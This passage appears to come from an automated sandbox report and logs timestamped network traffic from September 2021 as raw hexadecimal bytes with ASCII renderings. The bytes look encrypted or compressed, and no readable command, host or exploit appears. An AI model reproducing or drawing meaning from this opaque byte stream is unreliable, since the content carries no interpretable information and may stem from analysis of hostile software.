81 f4 0c cb 19 f4 79 8d 67 9d fa f1 50 47 cc 96 e2 25 2c 52 a2 6a db 8d de 3f 0f f3 81 a3 e2 36 89 51 29 c1 44 93 36 f4 87 dc 75 75 d7 e5 7b 6f c2 93 10 d6 79 13 ee 48 8e 90 e4 73 38 06 f7 5c bd cf 4b 26 95
                                    Data Ascii: *mKOvTu1huUk 9{+FO\h&dx&qM`oK"6Z_141c`oF?@9h(P#;t#@(=M8?IZ{>"1|rygPG%,Rj?6Q)D6uu{oyHs8\K&
                                    2021-09-27 16:40:46 UTC178INData Raw: 32 cb f9 d6 61 cf ae 85 20 b5 80 28 f7 c8 e0 ea a0 21 08 59 e4 6f fd 06 a9 1d b8 1d 4e c7 41 72 a3 41 4a 9d 66 8f 07 43 f2 48 d3 fd b2 56 a0 a3 f0 53 97 6f 2d d0 b1 dc 6d b8 10 7a 06 45 a1 00 42 15 48 88 2d 4b 76 6c ee 52 f7 70 fd 0e c2 2a 69 f7 9d f5 8a 25 11 e7 3a bc 3b 4b 0f 2d dd a3 ba 86 35 5e 43 06 a2 67 6a 39 79 64 43 8b b9 77 49 fa 0e de d9 76 6f 94 b2 17 0b 03 cd 61 00 e4 13 ae 8f 31 0b 65 67 a5 d1 1a 61 02 77 82 90 bd c3 88 77 6b 8d 47 5e df 35 11 07 b5 b6 a6 d0 b0 2f 1c 12 4a b0 60 fb c7 ec 33 a0 f4 23 68 f7 b4 82 ad 06 c0 36 1b 4f 26 6f c7 65 81 01 94 00 a2 aa 33 8a b3 49 cf 8f d3 2f 22 a1 19 3c 2d 48 05 05 c5 58 f0 a8 c5 5f 1b b7 b8 d2 cc 7b d7 4b 05 6d b4 56 3d 8b aa b5 d2 11 56 c4 0b 58 5c e7 c4 14 11 fe 80 f4 72 35 9f 35 59 4c 5e d8 fc 33
                                    Data Ascii: 2a (!YoNArAJfCHVSo-mzEBH-KvlRp*i%:;K-5^Cgj9ydCwIvoa1egawwkG^5/J`3#h6O&oe3I/"<-HX_{KmV=VX\r55YL^3
                                    2021-09-27 16:40:46 UTC179INData Raw: ae c3 33 26 db 9d 0a 6a 21 f6 7a 0e 93 8a f2 af 08 96 cb 89 03 28 ec 26 f2 a9 6f d4 89 a3 72 ab 39 25 71 94 8f 27 aa 42 c2 06 4f 92 ea 27 81 f1 26 70 89 32 45 8c 1d a0 fe ed 9e 54 af 57 ba c9 8d fe d3 24 90 5b 78 ed 2c 04 a0 5c bf 3e 46 85 3d c5 c5 79 65 58 90 fd c4 09 84 2f bc 40 a8 a0 89 0b f3 ef ea 5f 6a 3c 7e 7c 24 14 a9 ff 20 d3 76 92 73 eb a1 5f 22 bd ce 7f fb b1 cb 83 69 ea a3 68 5d a3 9f 5d cc fa b6 c9 a9 1f c6 c7 7c c8 74 2a 4d bc 68 5b 4c c9 01 e3 43 f8 3a e0 48 64 f1 41 4a 37 5f 59 e9 bb fb a7 01 e9 ae a8 b1 09 8c 7e 41 44 fa e4 a1 7b 36 24 37 59 49 8b 1a 3d fd 19 4f 36 f6 90 21 af 08 02 24 7c 88 35 8d 7b 81 ee 80 41 ae 26 06 7b 2e 07 b0 48 01 f9 d4 65 82 26 7d 94 68 ed 80 1d c7 8c 3a 5c 4a aa a1 36 8f 12 ca c5 83 f4 50 8b 3f df 74 a7 59 e1 6c
                                    Data Ascii: 3&j!z(&or9%q'BO'&p2ETW$[x,\>F=yeX/@_j<~|$ vs_"ih]]|t*Mh[LC:HdAJ7_Y~AD{6$7YI=O6!$|5{A&{.He&}h:\J6P?tYl
                                    2021-09-27 16:40:46 UTC180INData Raw: be 14 02 45 05 8a 58 11 43 82 be bb 48 e9 b9 a0 e0 74 76 35 23 43 c0 1a 65 33 2e 9f f0 3e bb 9e 86 49 87 0e 39 61 74 c5 97 54 83 76 1b bd 90 00 99 13 a7 36 33 d2 72 81 31 ac 40 04 f3 77 ff 90 96 7a 8a 83 68 6b d3 23 7e 83 e0 07 c8 b6 ea 69 b2 f5 05 f4 de cd e4 58 36 ec 4e a0 9a 9a 6a e9 b0 64 39 7b 3b c4 ea 4f 5b 6f 48 dc 83 14 8f e6 36 d7 7c 6c 42 49 b2 8f 63 96 20 e9 1d da b9 35 b4 0a 3b 58 8d a8 17 e6 19 5f a7 34 58 06 75 60 fb 6d c9 56 ce 32 a8 c9 d6 f7 c2 b9 2e 14 a2 e7 b9 14 04 58 82 e6 53 d3 0b 48 8d 20 a0 d8 81 33 75 b4 9f a6 42 28 7a 39 40 fb 0f 4f ef b8 64 87 11 49 cc f1 18 61 d9 0e 14 af bc 17 de ed 85 22 1c 31 d9 76 2a be 1a f6 9d db 80 c4 7b 8d f1 9d 2c ea cb 47 57 94 92 34 92 62 a0 6a 4d 8d 2f 3b e3 fb 1a a1 b1 27 56 61 2b c1 d2 93 ae d4 cb
                                    Data Ascii: EXCHtv5#Ce3.>I9atTv63r1@wzhk#~iX6Njd9{;O[oH6|lBIc 5;X_4Xu`mV2.XSH 3uB(z9@OdIa"1v*{,GW4bjM/;'Va+
                                    2021-09-27 16:40:46 UTC182INData Raw: e2 10 00 c5 04 65 95 3c ff c3 03 62 bb c1 ae 82 65 89 76 f3 01 46 5d cd 3e 98 e8 59 90 dd 3a 20 ae 76 9d de e9 e7 4b c4 29 b3 60 8c 74 cb fe 69 da 0e 6a 8c a1 79 c9 b1 01 05 0c a9 62 c6 96 d1 ca fa 3e ab 28 15 12 ff 0c 01 9e 43 8a 97 e2 b3 66 17 d5 37 9c aa 9c e9 c6 fb 34 ac eb 5c bd 57 9d f1 e8 be 81 fa 99 a1 cf 9b 26 12 5a af 1f 67 cf d1 db 4f 4b f6 45 8c ad fd 14 c2 e8 f5 fb b6 b9 81 93 80 b6 03 24 5f 78 c8 93 cd 54 50 3b d4 18 82 3f d7 96 5a fa 66 89 ba 74 bd 9e 4a d7 a1 0c 25 10 49 c6 65 60 2d cd aa 1d 74 da 59 ba c6 5e 0b 79 80 61 1e 2b 2d 97 9b bd ce 7b b2 d7 16 9f e7 a2 5f 89 ed 09 8e 73 72 95 84 6e 30 8e ca 61 01 0e f1 03 b0 c9 98 31 32 9d 99 5e b6 59 48 f0 bb 5a b0 01 0b f7 3c 2c 7e 97 a4 aa 34 42 fe f9 72 e6 4e 90 a4 bd 1a 0a 65 b0 ba dc ca 12
                                    Data Ascii: e<bevF]>Y: vK)`tijyb>(Cf74\W&ZgOKE$_xTP;?ZftJ%Ie`-tY^ya+-{_srn0a12^YHZ<,~4BrNe
                                    2021-09-27 16:40:46 UTC183INData Raw: a0 b2 88 05 f4 0f cf 60 5e d0 78 33 94 ed 53 6a 94 b0 46 e8 79 c0 f0 0c db 26 7a c3 15 83 69 8f a2 e7 d5 33 6d a4 dd cf 47 c9 5f 20 94 1d bf 68 37 05 0c dd cc f0 97 c1 2f 19 22 a7 b3 89 04 d7 61 1d f9 b4 dc 26 fb a8 b4 d6 5e 13 bb 0b 13 44 73 c4 67 15 8e 82 9b 53 18 da 4a 59 21 46 4c fc c1 62 62 9f db 42 c5 ab 3b 1b fc e9 db 92 25 39 51 11 34 cc ff c6 63 d8 0c f2 3b c1 2d 85 3b 85 5f 1c 01 07 74 f6 b9 fc 62 e0 1c 1f 12 7b f0 f1 cc f2 e8 b6 45 b1 00 ef 5e 0f b4 a0 17 4d ff f1 39 e9 f1 fc 35 cc d6 8f b7 2b bc d2 07 70 d6 61 de 08 e3 98 73 5d 89 c0 ee 86 60 a0 15 08 4a f3 06 94 40 3f e0 f5 21 2b 18 28 05 73 e9 04 b4 84 76 01 c4 50 68 28 4a df 0c a5 b2 0e c8 4c 9e 7f b2 0e ed 24 ee c8 2d d0 0d 56 02 cf 01 84 03 98 44 88 6a 42 86 87 51 4b 4e 68 36 b8 79 4a 94
                                    Data Ascii: `^x3SjFy&zi3mG_ h7/"a&^DsgSJY!FLbbB;%9Q4c;-;_tb{E^M95+pas]`J@?!+(svPh(JL$-VDjBQKNh6yJ
                                    2021-09-27 16:40:46 UTC184INData Raw: ce 66 3a 10 35 37 87 7a 7d bb 09 a5 71 eb 21 bd 18 58 f3 7e bb 67 6e e4 14 6f 46 26 6f 5a df da 65 3d e1 3d db 36 ea 93 51 ad 80 14 53 2d f7 35 b3 5f 15 ee 96 57 de 24 22 78 7b 56 cf 48 61 dd 40 65 d2 25 0d 96 27 fa b3 4c b8 8c b8 78 de aa b7 21 ff 10 34 c6 93 a5 2f 8b 9b fb e0 a7 23 e2 1c 5e 76 79 97 a3 1c 18 2b 71 0f c0 9d 11 68 d7 6b 9f de 60 5d b8 df ef 1a 0e d6 08 5e 6e 4d 8e 90 a3 03 53 f7 e5 24 b4 59 e6 e8 9d e4 5e ca 9b 4a c3 88 bc 24 7c e5 15 e6 2c 03 97 3a 68 36 c5 f8 1f e6 9b 79 8a 7f bd 67 0a a5 72 b8 22 fe f4 8d c3 7b 1e c7 5e f4 11 fd d7 48 b4 59 8e c9 f2 d6 72 7b 73 54 0d e2 c3 2f 2b a5 50 b3 ea cd 3c 58 20 73 1d 9e 1b 98 60 39 b2 6b 6e e6 02 5e 9c 4d cb be 83 f5 cf 56 87 50 b7 8b 2c 25 dc 9f ea c8 74 9c 59 0b 7a 8d 04 21 3d 08 09 31 c7 c8
                                    Data Ascii: f:57z}q!X~gnoF&oZe==6QS-5_W$"x{VHa@e%'Lx!4/#^vy+qhk`]^nMS$Y^J$|,:h6ygr"{^HYr{sT/+P<X s`9kn^MVP,%tYz!=1
                                    2021-09-27 16:40:46 UTC185INData Raw: 22 ba c6 14 11 68 16 e6 81 d5 7b 4a 24 21 ce 85 fe 33 42 84 0b a6 81 29 0a 3b 66 fc 43 12 90 b8 3d b7 85 49 8a f6 68 63 a5 0c 39 f2 c3 17 a4 dd 11 22 e9 30 a9 74 8b b9 10 ab e2 db 1b f4 ef 8d 8d 9a 5c e8 cb 45 bf f6 ed 34 2e 52 34 6a 2a 8f 5f 39 94 f1 cc c3 ce 27 8b 51 bf c1 f5 9a de d6 1c de 5a 15 9a f4 79 6f 54 93 18 d4 0e 15 75 4a 87 f0 96 62 3a 06 66 44 17 ea e6 07 0e e9 04 22 85 88 2b 03 50 15 29 b2 97 0e b5 a2 0f 5e 4c d2 6a 44 0d 90 24 f4 91 3f d3 0d 56 94 df bf ad e5 9a 39 88 76 0b 84 87 51 4b f8 6a af bd 9f 49 c9 c1 d8 76 a7 20 d7 09 e2 08 c0 65 2a 87 a5 48 9a d9 ed e1 8c 75 06 ab 2c 32 39 36 f4 07 d6 ed 67 cb 3b be 45 76 ff f9 14 dc 9a 61 34 45 15 e1 54 ad c3 a5 26 e9 8a ef 68 5c f6 0f 3c 95 8a f2 af 8e 86 19 88 e5 2a 81 36 76 8b 6d d4 99 b3 e0
                                    Data Ascii: "h{J$!3B);fC=Ihc9"0t\E4.R4j*_9'QZyoTuJb:fD"+P)^LjD$?V9vQKjIv e*Hu,296g;Eva4ET&h\<*6vm
                                    2021-09-27 16:40:46 UTC187INData Raw: a4 b1 68 1a 93 48 c6 49 92 2e 02 9a 27 52 ee 58 70 fb ef 00 13 83 4e 1f 95 3b f5 9a 01 cf 85 a6 5e 15 06 e6 47 77 29 dc 76 8d 9f 61 f5 b9 f5 31 75 e5 6f 02 ca f6 13 9e 4a 99 68 0f e1 b0 c6 b5 56 49 5a 81 7c b2 e5 0a 2e 2e ee 7e 0e a5 5e 24 58 fb ce 71 d4 51 da 98 1e 1b 0c 7f 85 b9 93 ff c2 3e 6a 60 ab 20 0a 80 58 1e 5a 4b c0 49 9d 5f 53 1c f1 8b b5 2a ec e7 a0 08 e3 a6 31 24 e5 ac eb bd 8b 0f 06 b3 96 99 81 38 68 ed 8e 42 28 b9 fe 26 2d fb 1f f7 f9 79 73 c5 b6 ff 1e e6 cd e2 e3 a2 17 bb 99 0b 7b 19 0d d9 54 ef 02 4e ed 6c 7c 31 58 6a 80 a5 99 7e 62 88 ee ff e7 b6 7f 34 ce 11 65 75 4c 52 97 1b ef 6b b9 12 a9 a3 6c f3 3a a6 fc 22 a5 92 cc 75 df e5 60 65 31 d0 8a 2d 1f 10 96 41 6e 9d 18 15 2e ac 25 91 10 ed e6 a0 d1 48 d9 36 97 43 ee 33 49 32 e7 9f d4 33 d6
                                    Data Ascii: hHI.'RXpN;^Gw)va1uoJhVIZ|..~^$XqQ>j` XZKI_S*1$8hB(&-ys{TNl|1Xj~b4euLRkl:"u`e1-An.%H6C3I23
                                    2021-09-27 16:40:46 UTC188INData Raw: c4 b8 aa e8 66 fc e5 c6 2e 8f ce 1a 8a d8 8a 3c e2 44 62 0c 44 9c de 6f f3 c8 b2 82 e0 cd ab 0c db f2 bf 87 c1 30 2f f3 6a 0e dc 60 3e 77 df 21 31 84 c1 22 8e 60 a9 2c e3 93 b5 a0 0e 0a 0f 48 b1 70 98 06 c1 20 3d 95 fc da 5c 52 df ea 75 a3 8c 9e b5 9f b6 01 c5 83 67 6e cb 68 fe b9 33 7a 55 c4 49 77 88 32 fd 00 d3 09 34 79 e1 87 94 49 01 fb f1 e8 25 75 48 a2 33 3d 28 37 e9 29 13 eb 06 ca 6c b0 2d 79 8e fd 8e ed 60 6c b8 45 23 d4 57 ae da a1 10 dc 89 ec 49 58 c0 3a 3f 91 bb f6 57 8d b8 1b 04 e5 18 99 e6 7e 3a 6d 06 89 43 ef a2 65 bd a4 71 f9 0e 02 ef ce 1e 43 bb 7d ea 58 e0 cb f3 f0 04 aa 6e 1f 21 fa 69 1e 90 75 69 5e d0 c2 59 30 b7 93 6d 5d 2d ba 45 db c5 7d 65 37 14 35 07 ea 1e 69 31 05 a0 ef 83 6e dc c3 e9 9c 13 87 e2 f1 fd 52 f7 c8 9f 9c 22 69 82 f5 75
                                    Data Ascii: f.<DbDo0/j`>w!1"`,Hp =\Rugnh3zUIw24yI%uH3=(7)l-y`lE#WIX:?W~:mCeqC}Xn!iui^Y0m]-E}e75i1nR"iu
                                    2021-09-27 16:40:46 UTC189INData Raw: 9d c5 ce 3a b2 81 77 90 fc b6 16 11 d4 26 46 22 e0 ef e7 c3 55 3f 32 5c 8d 10 29 a6 32 b3 a5 8e 6d fa 9f 6f 61 71 f0 23 c8 97 7c 2a 4c 5e 19 e9 73 38 34 38 7a 1b bf 4f 0d 61 98 b5 f9 6f d6 18 25 99 34 ca 6e d7 17 ce 3f 83 66 a0 67 33 42 d8 d4 cf b3 21 cf 5d 40 5f 37 11 5d 1b 48 07 05 c6 d0 74 03 64 a8 9e 11 8b dc 4f c3 5f 20 fd 95 5e 98 b8 9b 43 47 48 43 d0 b2 cc d0 9a dd 61 09 43 e6 17 70 0c 9c 8e 5b 46 7f 70 5f 54 57 55 23 1b 8d 2e 8b e4 51 ff d9 21 14 f3 82 bd aa 4e 03 08 ee bf 14 94 93 6c f2 02 65 63 87 2b 2e 62 87 8d ae 45 1f e6 2f df 79 53 05 97 75 14 d1 28 aa 72 cb e2 d8 a0 31 32 f3 73 77 81 be 07 23 14 83 a4 8a a0 ac 88 97 4f b0 47 82 d9 87 23 16 b5 df a6 1f 83 80 18 05 48 78 6f 24 cd 2a 33 96 d1 a6 68 58 b1 d3 a1 32 c1 34 0c b0 14 56 cd 37 81 26
                                    Data Ascii: :w&F"U?2\)2moaq#|*L^s848zOao%4n?fg3B!]@_7]HtdO_ ^CGHCaCp[Fp_TWU#.Q!Nlec+.bE/ySu(r12sw#OG#Hxo$*3hX24V7&
                                    2021-09-27 16:40:46 UTC191INData Raw: 23 ff ee 3f d4 57 39 8c 05 56 17 d9 5e 8a ae 9f 71 ea 27 f3 ed 8e 18 f4 8f f4 26 c1 4c 39 3d b6 eb b3 86 cc fd a9 b2 01 cf 0d 86 17 a6 f4 61 d7 a9 57 ee 3f be 61 c6 d7 dd 15 a7 be c9 06 f9 11 90 45 81 d0 be 0c c8 9e c6 7e bc fc ae 2c a0 91 ff ad 9f 9e 97 98 d9 00 40 26 f8 9e 24 d5 58 a3 d2 8e a1 22 16 97 0b 28 5d 63 99 07 30 82 23 0d 66 f8 f6 57 e7 32 ae a6 29 85 ed ed 44 55 68 75 9b cc 9c ff 88 28 02 5b 69 ec 28 1c 59 58 48 3d 1c a9 f4 e3 ab 78 22 68 23 f9 b2 06 e8 37 b6 6b e7 81 97 01 19 ed ad 5d 52 0d d0 52 70 1c cf f9 e2 d3 02 93 72 ea 07 4a b0 be 24 7e 28 95 bd 82 fe eb a8 6f ed a1 27 6d 3e d6 1b e2 9d 3a 5e c4 ab c0 cc 1b b8 be 5c 53 cc cf c3 e3 4d f8 a1 e0 b3 66 19 43 26 37 87 7a f9 bb ee a7 ab eb 54 bd 4e 0b cd 7c b5 67 d5 e4 a1 7b a8 24 57 5a 50
                                    Data Ascii: #?W9V^q'&L9=aW?aE~,@&$X"(]c0#fW2)DUhu([i(YXH=x"h#7k]RRprJ$~(o'm>:^\SMfC&7zTN|g{$WZP
                                    2021-09-27 16:40:46 UTC192INData Raw: c3 e2 ca a1 0a 9e 1c 0b 3a 1a 2f d4 58 ee 4b 4d d4 41 6f 35 21 69 8d 80 90 7a 23 8b 75 d1 b8 b2 d6 37 88 02 00 71 cd 51 fb 2b 8f 6f 78 11 51 90 00 f7 c3 a5 04 35 95 96 bd 75 47 ee 17 61 70 d0 0a 24 35 14 f7 42 c8 88 60 11 c4 ae 67 b0 0d e9 0f a3 b8 47 d5 37 9f 40 ed 34 7d 31 cf 9c 8d 3e a3 9a 83 4f 21 05 9b 4f b5 c0 3c 46 50 76 aa 88 05 15 e7 11 67 1e 42 c5 71 83 4e ab 69 15 16 77 8b 98 ce 42 8b 81 2b 61 c6 23 9a b1 22 09 7e a4 e3 46 70 e2 16 f9 0d cd e0 6c 73 fc fd 80 54 87 cb fb 6b 44 a0 7b 8d f8 1d 4d 71 67 d4 f3 e1 1c 9a e6 c0 df 2a 6d 51 43 d4 8f 2b b1 3d e9 e5 d2 0e 35 1b 05 f2 5a a7 a0 f4 c9 4c 57 94 34 99 0e e0 61 03 66 8d 56 23 14 91 c9 c8 fe 69 b9 15 1a 7b e5 da 1d 5c 68 d7 ee 1c d3 ca 40 08 21 11 d2 af 33 15 8c e9 a6 ba 20 9a 39 e3 f4 6b 4d b4
                                    Data Ascii: :/XKMAo5!iz#u7qQ+oxQ5uGap$5B`gG7@4}1>O!O<FPvgBqNiwB+a#"~FplsTkD{Mqg*mQC+=5ZLW4afV#i{\h@!3 9kM
                                    2021-09-27 16:40:46 UTC193INData Raw: 85 f2 ae 9e 81 1a 87 e5 28 91 5b 75 9a 6d d6 89 dd e4 b8 61 23 97 e9 f2 34 03 62 c0 18 4e 87 7c 26 7f ef c1 67 f4 30 8f 8e 1e b7 fe ec 08 75 77 47 5c c9 f0 dc 39 1f 92 5a 78 ce bb 1d da 5c 59 18 3a 9e 31 e7 c7 5c 64 43 06 ff c3 25 63 30 c1 41 86 a4 8a 16 f3 ed 7c 77 cc 21 98 7f 59 3d f8 c3 22 d1 76 b8 e4 ca e7 4a c4 94 b2 5e 89 90 c9 ad 68 c9 35 69 8c 8e 78 7c b1 f8 22 da aa 3a c6 c6 ea f9 fb 1b ab bc 15 69 fb cd 03 e2 43 cb ad c7 b3 64 17 77 36 1e 87 7b eb 8e fa 8e 97 eb 5c 8b 56 20 f1 7f bb 50 f9 cf a1 79 a0 1c 13 77 af 88 67 04 e0 10 4d 34 f6 aa b6 80 fd 15 c2 45 f4 1a b3 5d 83 d2 81 70 38 27 5f 45 c9 34 cd 4a 61 e3 d7 56 82 27 eb ab 5b c9 66 1d ba cc b9 4d 48 ab a1 77 18 27 49 c4 65 b4 2c bc 9b fa 76 e4 58 d6 fa 5e 0b 3d 81 ce 1e 19 2b 34 98 f9 ce 04
                                    Data Ascii: ([uma#4bN|&g0uwG\9Zx\Y:1\dC%c0A|w!Y="vJ^h5ix|":iCdw6{\V PywgM4E]p8'_E4JaV'[fMHw'Ie,vX^=+4
                                    2021-09-27 16:40:46 UTC194INData Raw: 78 3b 20 15 a2 ab 17 17 cc ab 78 47 1c d2 29 4d 66 90 55 f4 f9 2f af 0d 08 95 20 ae 5f e4 c7 3f e4 50 41 83 dd 56 2a df 07 a8 03 98 99 ee ea d0 47 ad 64 fc 18 f2 2f d0 0c 28 cb b6 d6 8e 72 d9 55 98 b1 12 79 18 ea 2d c4 e0 0d c3 81 7c b6 20 33 7b 65 df c2 34 9e 9a 5e 17 42 31 61 61 04 eb 14 0e 2c b2 f7 41 f7 df 2f 07 f2 a6 f2 ae bb 96 cb a8 e7 2a d1 27 52 8b 78 c8 8c a3 a0 aa 06 22 d5 9a f3 27 40 61 ab 06 28 93 7d 27 3c f1 ad 72 f2 34 8e ae 1f a1 87 ed 5f 65 74 50 5c ca 8b fe a1 36 90 5b 3e ec c7 04 67 48 5b 3c 3b 84 4e e6 61 69 67 58 06 fc 42 03 a9 1f c3 40 86 82 08 0b cb c8 7b 5f cd 3f 1d 7e f9 25 fe dc 61 d2 f1 92 0a ec e5 4b 87 be 3a 7f 8e a2 ca 83 2a eb be 68 18 90 7a 5f b1 fb 91 ea 7d 15 ce c7 a9 c9 4f 3e 28 bf 14 5b fa eb c2 e3 40 d6 aa e0 b3 67 d4
                                    Data Ascii: x; xG)MfU/ _?PAV*Gd/(rUy-| 3{e4^B1aa,A/*'Rx"'@a(}'<r4_etP\6[>gH[<;NaigXB@{_?~%aK:*hz_}O>([@g
                                    2021-09-27 16:40:46 UTC195INData Raw: 14 0e 49 d4 07 f4 14 08 84 fd 26 0c 58 fb cd 78 8a cb e3 c1 cf 67 c5 f7 85 bb 6b 82 e6 cf af 92 65 df 74 3f 4c 5f 40 f9 24 af 48 0f ea 78 4b 0c 77 2d db b9 cf 4f 72 ce 66 d1 9a d7 22 69 f6 56 03 49 6d 6c 9d 44 ae 1a d4 75 44 90 07 b6 03 e7 56 35 cc d7 5d 31 2d ee 14 20 70 95 58 24 60 55 f7 21 a2 88 47 50 e7 cf fd bb 2c a8 2f e7 c6 31 dd 58 3a 36 6a 51 21 5a 42 fa 28 5f e6 fd 21 4b 9c 4f de 28 37 c5 ff 15 15 31 66 fb 20 6d 88 66 c3 7c 78 bc 14 ee d5 c1 7b 76 7c 1a ec d1 bd 17 ca 83 2b 29 45 67 9d b1 43 47 b5 f0 e4 46 f7 b7 05 bc 0a cd 01 1c d0 8c 71 a0 97 f7 68 8d f2 64 ca 39 c0 96 4e 4d 41 2d c7 9b c3 14 c7 ab e1 94 33 2f e7 4b 8c cc d3 fd 61 e9 58 99 2f 73 46 0c 9a 19 f0 e0 86 c9 7a 1c a7 56 8d 06 b4 22 1d 0b f7 56 58 5e aa af 95 f7 33 fa 0b 7b 07 e5 86
                                    Data Ascii: I&Xxgket?L_@$HxKw-Orf"iVImlDuDV5]1- pX$`U!GP,/1X:6jQ!ZB(_!KO(71f mf|x{v|+)EgCGFqhd9NMA-3/KaX/sFzV"VX^3{
                                    2021-09-27 16:40:46 UTC196INData Raw: 79 e7 65 31 a7 f9 50 86 ba 20 6c 45 53 a9 44 e9 9b a5 6e a1 9a 8d 30 5c 94 47 2c f2 d2 f2 cb c6 96 7f d0 e5 4c c9 26 12 d3 6d 96 d0 a3 a7 f2 61 66 ce 96 b7 7e 03 26 99 06 08 cb 7c 6f 26 f0 a1 2b f4 50 d6 ae 7c f9 fe 89 51 54 13 09 5c ad a9 fe 5f 5f 92 19 22 ed f9 5e da 1a 03 3c 7e df 31 a0 9d 79 22 02 06 b5 99 03 03 77 c1 22 dc 83 e8 51 f3 8b 26 5f a8 64 98 18 03 14 9e 86 22 b4 13 e6 ba 9d 86 27 b1 da ec 20 89 e1 ac f7 36 9c 54 04 f9 c4 26 00 b1 b8 43 ea e8 7e c6 83 8b c8 bf 5f ab f8 74 5b bd 8b 03 ab 22 f8 cd 81 b3 04 76 43 54 56 87 1e 8a bb 9e c6 97 8f 3d bd 30 6a f1 16 da 67 9f 81 d5 24 e4 45 66 3b af fa 02 49 be 79 2c 42 97 90 e7 dd 92 60 a7 1d 81 50 d7 1b e2 9a e1 41 7f 43 2b 37 aa 6f a8 2b 15 99 b7 11 e3 26 bb e6 35 90 03 7c ce c8 d9 0c 29 aa f1 44
                                    Data Ascii: ye1P lESDn0\G,L&maf~&|o&+P|QT\__"^<~1y"w"Q&_d"' 6T&C~_t["vCTV=0jg$Ef;Iy,B`PAC+7o+&5|)D
                                    2021-09-27 16:40:46 UTC198INData Raw: c9 76 52 ed 96 0e 11 02 8a 1f 04 03 a1 78 43 4d 14 ba 21 8a e4 68 74 94 df dd dc 2d e9 6e c4 c7 17 f1 59 39 26 06 77 15 56 4a fa 08 4a e2 f9 0c 08 9b 6d b6 2a 76 80 f9 30 5c 18 75 e0 1d 67 e4 51 cb 7e 58 bc 3b ef d1 c3 71 67 15 32 e7 e4 f8 3b fe ea 1a 04 2b 4e ba df 72 53 d4 c4 cf 27 d2 99 60 f4 01 88 0e 2b bd 8b 41 c1 96 d9 0d e9 f9 20 c6 08 b0 9f 7f 2c 44 03 a2 f3 c8 47 ea 94 c9 b6 5f 04 de 2a ad e3 b6 b9 76 86 59 b5 5a 57 69 69 dd 3d 95 dc 9a 81 7a 31 c3 58 ab 06 85 14 73 1b dd 3b 58 5b c3 ac ba 93 1c d8 65 77 28 80 c4 47 70 0e e5 ae 32 bd f9 24 3c 21 14 af 92 47 2b e9 f8 f2 3b 58 89 71 7a 92 8d 21 f7 b8 6f d2 7f 2c ad 82 eb 29 b9 62 96 c1 a4 17 e7 af e2 43 68 54 07 17 98 dd 90 91 e0 9c 7e 80 2d f4 81 f8 fc 98 d9 28 f9 f7 81 50 42 37 a2 02 2c e3 dd 57
                                    Data Ascii: vRxCM!ht-nY9&wVJJm*v0\ugQ~X;qg2;+NrS'`+A ,DG_*vYZWii=z1Xs;X[ew(Gp2$<!G+;Xqz!o,)bChT~-(PB7,W
                                    2021-09-27 16:40:46 UTC199INData Raw: 84 bd 57 6a fe 3e 1b 99 d3 6b b4 1c 38 4f 5e 85 79 92 b3 09 32 3d 64 af a6 70 12 42 af 33 e3 83 cc 6e 87 bd 19 2c bd 51 f6 0d 3c 14 ba b0 4d a0 13 92 a1 82 94 3b ab cc d6 7f dd e0 b0 d3 08 98 46 0d 8c f3 1c 29 d4 88 51 8f ab 5c b4 a2 8b bc 9f 3e e6 cb 79 2f 93 89 62 90 37 bc c9 8c d6 01 76 37 52 37 c0 1f 9f f0 9e de f5 86 3d cf 33 58 85 1f cf 02 f8 a1 c5 12 d4 4b 60 18 dd e6 10 4e 80 5f 21 53 a5 e4 d6 db 98 14 86 1b 99 50 c7 3a 83 89 e5 35 67 65 3e 16 9f 77 a4 3c 04 dd 82 0d f0 43 8a f0 09 8e 07 6b d3 ef f9 0c 3c d8 c8 54 6c 66 2c c6 36 a2 6c df f3 89 13 c6 3d a0 8e 28 79 10 e2 82 6a 7d 2b 32 f6 ad be 6f e2 b0 64 d8 82 5a 3a ca be 9b e9 6a 33 7f cc 1e 59 ec bf 83 64 53 b0 90 db d0 d9 85 7a ed f0 3c c3 bb 2d c3 c0 d9 de 0c 40 73 79 59 11 e5 c0 7d 40 b1 8a
                                    Data Ascii: Wj>k8O^y2=dpB3n,Q<M;F)Q\>y/b7v7R7=3XK`N_!SP:5ge>w<Ck<Tlf,6l=(yj}+2odZ:j3YdSz<-@syY}@
                                    2021-09-27 16:40:46 UTC200INData Raw: ca 3b e4 ec 09 0f 16 57 ad d8 68 62 b5 f1 c3 32 e0 87 6c 82 29 b9 05 0e a2 81 55 c9 98 d0 3b 9d c2 0d c1 1c c0 b3 63 20 56 0e b5 96 d2 60 fd 8f ce b0 33 39 cb 18 bb fd ba d7 45 e9 5a bf 5b 66 71 7e b4 34 97 a8 96 bc 79 2c d3 46 a7 68 b0 61 4e 16 c7 22 58 70 84 8d a4 96 23 d0 65 74 44 b1 ab 41 5d 07 ee 81 53 87 f2 04 36 4f 21 da 9b 56 36 db f8 c8 23 4a 80 5c 57 93 8e 4d e1 dd 49 e8 76 27 ad 93 e2 04 94 63 95 ad a6 72 d0 82 ca 51 7b 31 0d 1e f6 fa 94 f4 a4 b3 1b b1 11 8d b7 f5 ba ad de 45 f9 fe ef 55 46 52 c0 02 4d c0 d8 4f 8a 99 fc c7 a4 27 ee 39 29 a7 ba 93 5f bc 61 b9 6d 01 c7 a4 18 1c b1 e4 e9 a4 8c 5f 69 39 9b 90 d7 0d 57 76 82 28 4e 87 01 74 1b e9 42 4e f1 fb 4e 22 1f 74 5c da 97 69 c0 c6 51 1b 34 b7 19 21 78 f1 46 98 e4 7f b1 79 3e 94 88 ca dd a3 ef
                                    Data Ascii: ;Whb2l)U;c V`39EZ[fq~4y,FhaN"Xp#etDA]S6O!V6#J\WMIv'crQ{1EUFRMO'9)_am_i9Wv(NtBNN"t\iQ4!xFy>
                                    2021-09-27 16:40:46 UTC201INData Raw: a9 88 5f c6 be 72 3e 8e b5 53 82 31 99 c1 e0 d1 0b 17 20 5a 37 e3 17 eb dc 9e d3 c8 a0 28 d8 3a 0b 82 1b cf 38 b1 90 c4 16 a0 72 73 2f c3 fd 20 58 95 74 39 53 9b 90 d0 ca 89 4b 84 17 99 50 e0 26 f0 9a e5 2c 38 69 2f 1d ba 64 b9 21 0f ba 85 1c f1 52 8e f9 5a 9c 0b 1f dd e1 b8 2b 31 c7 cc 53 6d 60 20 a5 24 9a 4a e4 e9 92 02 cf 34 e1 b2 3d 78 11 c1 9b 79 77 59 18 ed a8 a3 06 c2 81 64 f6 8a 34 0d d9 b1 8b e3 63 72 42 fb 1e 49 fe be 98 55 21 96 8b c1 d2 f7 83 63 9f dc 30 c3 a2 48 81 e6 bc f1 12 0b 52 6e 2e 3b f9 a4 7a 5a c5 bf 71 70 d3 20 93 cd d0 58 65 0a 4a df 43 90 f4 52 